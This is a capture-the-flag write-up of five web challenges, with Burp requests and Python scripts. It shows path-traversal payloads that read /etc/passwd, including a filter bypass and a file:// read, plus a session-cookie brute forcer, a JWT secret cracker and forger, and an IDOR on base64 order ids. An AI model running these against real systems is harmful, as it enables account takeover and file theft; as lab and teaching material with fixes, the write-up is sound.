H7CTF - Web Challenges
Published by Josan, 26th Sep 2024
Tags: #web #directory-traversal #idor #jwt #path-traversal

No Paste

  • Checking the website, we can see that the input is disabled

  • Checking the page source, we find script.js. Analyzing it:
// Read the value of the (client-side disabled) input and POST it to /submit?input=...
const _2f7956 = document.getElementById('challengeInput').value;
fetch('/submit?input=' + encodeURIComponent(_2f7956), {'method': 'POST'})
  .then(_101da1 => _101da1.json())
  .then(_5c2193 => {
    // On success the JSON response carries the flag, otherwise an error message
    const _ae2c45 = document.getElementById('result');
    _5c2193.success ? _ae2c45.textContent = 'Flag: ' + _5c2193.flag : _ae2c45.textContent = _5c2193.message;
  })
  .catch(_3c7f8d => {
    console.error('Error:', _3c7f8d);
  });
  
  • So the page sends a POST request to /submit?input=<value>; the disabled input only stops the browser form, not the request itself. The value to supply is bypass123

  • Constructing the request accordingly in Burp:
POST /submit?input=bypass123 HTTP/2
Host: paste.h7tex.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
  • Once we send the request, we obtain the flag

Code Breaker

  • Checking the website, we find a login page

  • There is also an admin page at the /admin endpoint

  • Logging in with the mentioned credentials

  • Analyzing the requests and responses in Burp, we can see that the session id is just the base64-encoded username followed by some random digits. In this example, user1 is the username and 738 are the random digits

  • Changing user1 to admin, brute-forcing the random digits and switching the endpoint to /admin
  • The response tells us which candidate is the right admin cookie

  • Setting the cookie to that value, we get the flag
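
How the session-id brute force can be scripted, as an added example that is not part of the original writeup. It assumes the id is base64 of the username immediately followed by exactly three zero-padded digits (the user1/738 example above); if the digits are instead appended after the base64 of the username alone, the same loop works with encode_digits=False. The search takes an oracle callback, so it runs unchanged against the real /admin endpoint or, as here, against a constructed stand-in. The cookie name, the /admin URL and the "not bounced to the login page" success test inside http_oracle are assumptions to adjust to what Burp shows.

```python
import base64
import urllib.error
import urllib.request

# Assumption reconstructed from the writeup: exactly three digits, zero-padded.
DIGITS = 3


def make_session_id(username: str, digits: str, encode_digits: bool = True) -> str:
    """Build a session id in the observed format: base64("<user><digits>")."""
    if encode_digits:
        return base64.b64encode(f"{username}{digits}".encode()).decode()
    # Variant: base64("<user>") with the digits appended in the clear.
    return base64.b64encode(username.encode()).decode() + digits


def parse_session_id(session_id: str, encode_digits: bool = True):
    """Split a session id back into (username, digits)."""
    if encode_digits:
        raw = base64.b64decode(session_id).decode()
        return raw[:-DIGITS], raw[-DIGITS:]
    b64, digits = session_id[:-DIGITS], session_id[-DIGITS:]
    return base64.b64decode(b64).decode(), digits


def candidate_session_ids(username: str, encode_digits: bool = True):
    """Yield every possible session id for `username` over the 10**DIGITS suffixes."""
    for n in range(10 ** DIGITS):
        yield make_session_id(username, f"{n:0{DIGITS}d}", encode_digits)


def find_valid_session(username: str, is_valid, encode_digits: bool = True):
    """Try each candidate against an oracle is_valid(session_id) -> bool.

    Returns the first accepted session id, or None when none of them works."""
    for sid in candidate_session_ids(username, encode_digits):
        if is_valid(sid):
            return sid
    return None


def http_oracle(url: str, cookie_name: str = "session"):
    """Oracle backed by the real server (assumed cookie name and success test).

    A candidate counts as valid when GET url with that cookie returns 200 and
    the body is not the login page."""
    def is_valid(sid: str) -> bool:
        req = urllib.request.Request(url, headers={"Cookie": f"{cookie_name}={sid}"})
        try:
            with urllib.request.urlopen(req) as resp:
                return resp.status == 200 and b"login" not in resp.read().lower()
        except urllib.error.HTTPError:
            return False
    return is_valid


if __name__ == "__main__":
    # Constructed stand-in for the server: the only valid admin session is admin412.
    secret = make_session_id("admin", "412")
    found = find_valid_session("admin", lambda sid: sid == secret)
    print("valid admin session:", found, parse_session_id(found))
    # Against the real target you would instead pass:
    # find_valid_session("admin", http_oracle("https://<host>/admin"))
```

One thousand requests is cheap, which is the whole problem with this scheme: a session id must be unguessable (a random value of at least 128 bits from a CSPRNG), never a predictable encoding of the identity it represents.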

NewsLeaks

  • Checking the website, we find several newspaper articles

  • Analyzing the requests, we see a file parameter, so this could be Local File Inclusion (LFI)

  • If you are not familiar with performing LFI by hand, you can also brute-force the parameter with LFI payload lists available online
  • We will try the manual way. The web root is usually /var/www/html, so keeping that in mind we try ../../../etc/passwd

  • We can see that it is filtering some of the / and . characters
  • Trying to double them, for example ....//....//....//etc/passwd

  • We can see that three dots are reflected, which suggests the filter strips its pattern only once rather than recursively. Removing one dot gives the final payload ...//...//...//etc/passwd

  • YAAYYYYYY... but wait, where is the flag? Our payload bypassed the filter, but we still need to figure out the number of directories to go back. Adding one more ...// shows why: the articles live in a /news directory under the web root, so we need to go back one extra time

  • We got the flag

Paper Chase

  • This is similar to the previous one, but with better filters. REALLY? LOL!

  • Analyzing the requests, we again see a file parameter, so this could also be Local File Inclusion (LFI)
  • Trying the payload from the previous challenge, we can see that wherever there are two dots they are converted to #

  • Trying different approaches, the file: scheme succeeds: the filter only looks for dot sequences, so an absolute file:// URL passes straight through. Using it to read the file:
file:///etc/passwd
  • We got the flag
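
Both filters can be modelled offline. The following is an added example, not code from either challenge: newsleaks_filter and paperchase_filter are reconstructions that reproduce the observations above ("....//" reflected as three dots, "...//" collapsing to "../", ".." becoming "#", file: passing untouched) and are assumptions about the real implementations; WEB_ROOT is the /var/www/html/news directory inferred in the NewsLeaks solve. The last function shows the check the developer should have used instead of stripping patterns: resolve the requested name under the web root and refuse anything that escapes it or carries a URL scheme.

```python
import posixpath
import re

WEB_ROOT = "/var/www/html/news"   # assumed: the article directory inferred in the writeup


def newsleaks_filter(path: str) -> str:
    """Reconstruction (assumption) of the NewsLeaks filter: strip "./" once, non-recursively.

    This explains both observations: "....//" -> ".../" (three dots reflected)
    and "...//" -> "../" (the bypass)."""
    return path.replace("./", "")


def paperchase_filter(path: str) -> str:
    """Reconstruction (assumption) of the Paper Chase filter: every ".." becomes "#"."""
    return path.replace("..", "#")


def traversal_payload(depth: int, target: str = "etc/passwd") -> str:
    """Payload that survives newsleaks_filter: each "...//" collapses to exactly one "../"."""
    return "...//" * depth + target


def is_traversal(filtered: str) -> bool:
    """True when the string the application finally opens still walks upward."""
    return "../" in filtered


def safe_join(base: str, user_path: str):
    """Hardened replacement for both filters: no pattern stripping at all.

    Reject URL schemes outright (that is what let file:///etc/passwd through in
    Paper Chase), then resolve the name under `base` and reject anything whose
    resolved form leaves it.  Returns the resolved path, or None when refused.
    In production also run os.path.realpath() on the result to defeat symlinks."""
    if re.match(r"^[A-Za-z][A-Za-z0-9+.\-]*:", user_path):
        return None                      # e.g. file:///etc/passwd, php://filter
    base = posixpath.normpath(base)
    full = posixpath.normpath(posixpath.join(base, user_path.lstrip("/")))
    if full != base and not full.startswith(base + "/"):
        return None                      # resolved outside the web root
    return full


if __name__ == "__main__":
    for depth in (3, 4):
        p = traversal_payload(depth)
        print(p, "->", newsleaks_filter(p), "| safe_join:", safe_join(WEB_ROOT, newsleaks_filter(p)))
    print("file:///etc/passwd ->", paperchase_filter("file:///etc/passwd"),
          "| safe_join:", safe_join(WEB_ROOT, "file:///etc/passwd"))
```

Note what happens to the obfuscated payload without the bad filter: "...//" is not a traversal sequence at all, so safe_join happily returns a (nonexistent) file under the web root, while the string the naive filter produces, ../../../../etc/passwd, is refused. Stripping patterns turns harmless input into dangerous input; resolving the path and checking the result does not.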

Pizza

  • I was the only guy to solve this challenge, NOT A FLEX :)

  • Registering and logging in as a new user

  • Analyzing the requests and responses in Burp, we get a JWT

  • Using jwt.io to decode it, changing isAdmin to true and sending the modified token

  • But when we submit the cookie, the server says the token is invalid: the signature no longer matches the edited payload

  • Trying to crack the signing secret with hashcat and the jwt.secrets.list wordlist (mode 16500 is JWT):
$ hashcat -a 0 -m 16500 <YOUR-JWT> /path/to/jwt.secrets.list

  • Signing the modified token with the recovered secret and replacing the cookie
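
The crack-and-forge steps above, done offline in plain Python as an added example (not the challenge's code, and not a substitute for hashcat on a real wordlist). The token, the secret "pizza" and the five-entry word list are constructed for the example; the real attack runs the same loop over jwt.secrets.list, which is what hashcat -m 16500 does, only far faster. The verifier deliberately ignores the alg claim in the token, which is also what a server must do.

```python
import base64
import hashlib
import hmac
import json

# Constructed sample: secret, claims and word list are assumptions for this example.
SAMPLE_SECRET = "pizza"
SAMPLE_CLAIMS = {"username": "newuser", "isAdmin": False}
WORDLIST = ["secret", "password", "jwt_secret", "pizza", "admin123"]   # stand-in for jwt.secrets.list


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def hs256_sign(signing_input: bytes, secret: str) -> bytes:
    return hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()


def make_jwt(claims: dict, secret: str) -> str:
    """Issue an HS256 token the way a typical web framework would."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hs256_sign(f"{header}.{payload}".encode(), secret)
    return f"{header}.{payload}.{b64url_encode(sig)}"


def verify_jwt(token: str, secret: str):
    """Return the claims if the signature checks out under `secret`, else None."""
    try:
        header, payload, sig = token.split(".")
    except ValueError:
        return None
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        return None                      # never let the token choose the algorithm
    expected = hs256_sign(f"{header}.{payload}".encode(), secret)
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(payload))


def crack_secret(token: str, wordlist):
    """Dictionary attack on the signing key, one candidate at a time.

    Re-signs the token's original header.payload bytes, so JSON formatting
    differences between us and the issuer cannot cause false negatives."""
    for candidate in wordlist:
        if verify_jwt(token, candidate) is not None:
            return candidate
    return None


def forge_jwt(token: str, secret: str, changes: dict) -> str:
    """Re-sign the token with modified claims (e.g. isAdmin=true) once the secret is known."""
    header, payload, _ = token.split(".")
    claims = json.loads(b64url_decode(payload))
    claims.update(changes)
    new_payload = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hs256_sign(f"{header}.{new_payload}".encode(), secret)
    return f"{header}.{new_payload}.{b64url_encode(sig)}"


if __name__ == "__main__":
    token = make_jwt(SAMPLE_CLAIMS, SAMPLE_SECRET)
    secret = crack_secret(token, WORDLIST)
    admin_token = forge_jwt(token, secret, {"isAdmin": True})
    print("recovered secret:", secret)
    print("admin token:", admin_token)
    print("server accepts as:", verify_jwt(admin_token, SAMPLE_SECRET))
```

The failed first attempt in the writeup (editing isAdmin on jwt.io without the key) corresponds to forge_jwt with a wrong secret: the structure is valid but verify_jwt returns None, hence "invalid token". The fix on the server side is simply a long random secret; a dictionary word as an HMAC key is a password, and gets cracked like one.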

  • Adding an item to the cart and opening the cart
  • Placing the order

  • Entering the information

  • We get the order details

  • Analyzing the requests and responses in Burp, we can see the order token

  • Also, while querying the order status, there is a request to the endpoint /api/order/SUQ1

  • The identifier SUQ1 is base64: it decodes to ID5, so order ids are predictable

  • Changing it to ID0, which encodes to SUQw

  • Querying that order with the forged admin JWT (an IDOR: the id is guessable and the endpoint only checks that the token is valid)
  • The cookie can also be changed with a cookie editor extension

  • We got the flag
